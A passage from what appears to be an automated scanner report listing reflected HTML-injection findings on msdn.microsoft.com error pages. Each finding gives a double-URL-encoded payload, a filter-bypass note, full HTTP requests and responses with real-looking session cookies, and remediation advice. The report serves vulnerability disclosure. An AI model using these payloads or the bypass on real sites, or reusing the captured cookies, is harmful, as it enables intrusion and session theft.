MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us4846e"><a>d113f5f9538/library/dd582938(office.11" />
...[SNIP]...

2.53. http://msdn.microsoft.com/en-us/library/dd582938(office.11 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(office.11

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4c1%2522%253e%253ca%253ea9f77ed350d was submitted in the REST URL parameter 2. This input was echoed as 6f4c1"><a>a9f77ed350d in the application's response. The reflection point is the aspxerrorpath value that the error page /en-us/Message-Error.htm.htm writes, unencoded, into the value attribute of its hidden fromPage input: the double quote closes that attribute and the <a> that follows is rendered as a new tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Independently of that, the value should be HTML-attribute-encoded when it is written into the value attribute of the hidden fromPage input, so that a double quote in the path cannot close the attribute even if the character filter is bypassed.

Request

GET /en-us/library6f4c1%2522%253e%253ca%253ea9f77ed350d/dd582938(office.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:24 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library6f4c1"><a>a9f77ed350d/dd582938(office.11" />
...[SNIP]...

2.54. http://msdn.microsoft.com/en-us/library/dd582938(office.11 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(office.11

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47a5b%2522%253e%253ca%253e22a3e17d330 was submitted in the REST URL parameter 3. This input was echoed as 47a5b"><a>22a3e17d330 in the application's response. The reflection point is the aspxerrorpath value that the error page /en-us/Message-Error.htm.htm writes, unencoded, into the value attribute of its hidden fromPage input: the double quote closes that attribute and the <a> that follows is rendered as a new tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Independently of that, the value should be HTML-attribute-encoded when it is written into the value attribute of the hidden fromPage input, so that a double quote in the path cannot close the attribute even if the character filter is bypassed.

Request

GET /en-us/library/dd582938(office.1147a5b%2522%253e%253ca%253e22a3e17d330 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9219
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(office.1147a5b"><a>22a3e17d330" />
...[SNIP]...

2.55. http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(office.11).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload feb63%2522%253e%253ca%253e27a0f0d059b was submitted in the REST URL parameter 1. This input was echoed as feb63"><a>27a0f0d059b in the application's response. The reflection point is the aspxerrorpath value that the error page /en-us/Message-Error.htm.htm writes, unencoded, into the value attribute of its hidden fromPage input: the double quote closes that attribute and the <a> that follows is rendered as a new tag.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out. Independently of that, the value should be HTML-attribute-encoded when it is written into the value attribute of the hidden fromPage input, so that a double quote in the path cannot close the attribute even if the character filter is bypassed.

Request

GET /en-usfeb63%2522%253e%253ca%253e27a0f0d059b/library/dd582938(office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:55:28 GMT
Content-Length: 9197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usfeb63"><a>27a0f0d059b/library/dd582938(office.11)" />
...[SNIP]...

2.56. http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(office.11).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a58b3%2522%253e%253ca%253ea478026753a was submitted in the REST URL parameter 2. This input was echoed as a58b3"><a>a478026753a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/librarya58b3%2522%253e%253ca%253ea478026753a/dd582938(office.11).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:55:59 GMT
Content-Length: 9196

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarya58b3"><a>a478026753a/dd582938(office.11)" />
...[SNIP]...

2.57. http://msdn.microsoft.com/en-us/library/dd582938(office.11).aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(office.11).aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5fd90%2522%253e%253ca%253e989d6e38d2f was submitted in the REST URL parameter 3. This input was echoed as 5fd90"><a>989d6e38d2f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/dd582938(office.11).aspx5fd90%2522%253e%253ca%253e989d6e38d2f HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=116E8h002j20101; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:56:29 GMT
Content-Length: 9206

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/dd582938(office.11).aspx5fd90"><a>989d6e38d2f" />
...[SNIP]...

2.58. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v/x3doffice.11

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d75f6%2522%253e%253ca%253e1af47b0d7bc was submitted in the REST URL parameter 1. This input was echoed as d75f6"><a>1af47b0d7bc in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usd75f6%2522%253e%253ca%253e1af47b0d7bc/library/dd582938(v/x3doffice.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9229
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:13:22 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usd75f6"><a>1af47b0d7bc/library/dd582938(v/x3doffice.11" />
...[SNIP]...

2.59. http://msdn.microsoft.com/en-us/library/dd582938(v/x3doffice.11 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/dd582938(v/x3doffice.11

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0137%2522%253e%253ca%253e0e5c27062dd was submitted in the REST URL parameter 2. This input was echoed as c0137"><a>0e5c27062dd in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryc0137%2522%253e%253ca%253e0e5c27062dd/dd582938(v/x3doffice.11 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
